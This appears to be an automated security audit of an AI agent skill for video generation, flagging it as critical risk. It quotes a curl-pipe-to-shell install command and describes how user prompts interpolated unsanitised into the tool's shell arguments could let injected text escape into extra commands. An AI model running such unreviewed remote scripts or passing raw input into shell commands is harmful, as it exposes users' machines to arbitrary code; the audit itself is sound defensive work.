ai-video-generation
Fail
Audited by Gen Agent Trust Hub on Mar 4, 2026
Risk Level: CRITICALREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill facilitates remote code execution by directing users to run
curl -fsSL https://cli.inference.sh | sh. This pattern is highly insecure as it allows an external, untrusted server to execute arbitrary scripts directly in the user's terminal environment. - [EXTERNAL_DOWNLOADS]: During the installation and operation of the
infshtool, the skill initiates downloads of binaries and configuration files fromdist.inference.shandcli.inference.sh. These domains are not recognized as trusted sources or well-known services. - [COMMAND_EXECUTION]: The skill requests permission to use the
Bashtool to runinfshcommands. This grants the agent the capability to interact with the local operating system, file system, and network through the installed CLI utility. - [PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection because it interpolates user-provided text directly into the command-line arguments of the
infshtool. - Ingestion points: User-provided strings (e.g., video prompts) are ingested into the
--inputJSON payload of theinfsh app runcommand as seen inSKILL.mdexamples. - Boundary markers: There are no boundary markers or delimiters defined to isolate user input from the shell command structure.
- Capability inventory: The skill has
Bashexecution privileges, which can be exploited if a malicious prompt successfully escapes the intended JSON structure to execute additional shell commands. - Sanitization: The skill lacks any sanitization or validation logic to escape special characters or filter potentially malicious shell sequences from user input before execution.
Recommendations
- HIGH: Downloads and executes remote code from: https://cli.inference.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata